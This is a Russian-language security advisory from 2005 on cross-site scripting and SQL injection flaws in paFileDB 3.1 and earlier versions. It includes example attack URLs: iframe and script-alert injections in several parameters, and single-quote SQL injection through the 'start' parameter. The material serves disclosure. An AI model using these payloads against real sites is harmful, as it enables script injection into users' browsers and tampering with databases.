Security Lab

SQL-инъекция и межсайтовый скриптинг в paFileDB

Дата публикации:14.03.2005
Всего просмотров:1228
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: paFileDB 3.1 и более ранние версии

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных уязвимого приложения.

1. Межсайтовый скриптинг возможен из-за некорректной фильтрации входных данных в некоторых параметрах. Злоумышленник может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере целевого пользователя. Примеры:

http://[target]/[pafiledb_dir]/pafiledb.php?action=viewall&start=">
<iframe%20src=http://www.securityreason.com></iframe>&sortby=rating

http://[target]/[pafiledb_dir]/pafiledb.php?action=category&start=">
<iframe%20src=http://www.securityreason.com></iframe>&sortby=date

http://[target]/[pafiledb_dir]/pafiledb.php?"><script>alert();</script>

http://[target]/[pafiledb_d ir]/pafiledb.php?action="><script>alert();</script>

http://[target]/[pafiledb_dir]/pafiledb.php?[something]=">
< script>alert();</script>

http://[target]/[pafiledb_dir]/p afiledb.php?[something]=&
[something]="><script>alert();</script>

2. Отсутствует фильтрация входных данных в параметре start. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды на уязвимой системе. Пример:

http://[target]/[pafiledb_dir]/pafiledb.php?action=viewall&start='&sortby=rating

http://[target]/[pafiledb_dir]/pafiledb.php?action=category&start='&sortby=rating

URL производителя: http://www.phparena.net/pafiledb.php

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: SQL injection and XSS in paFileDB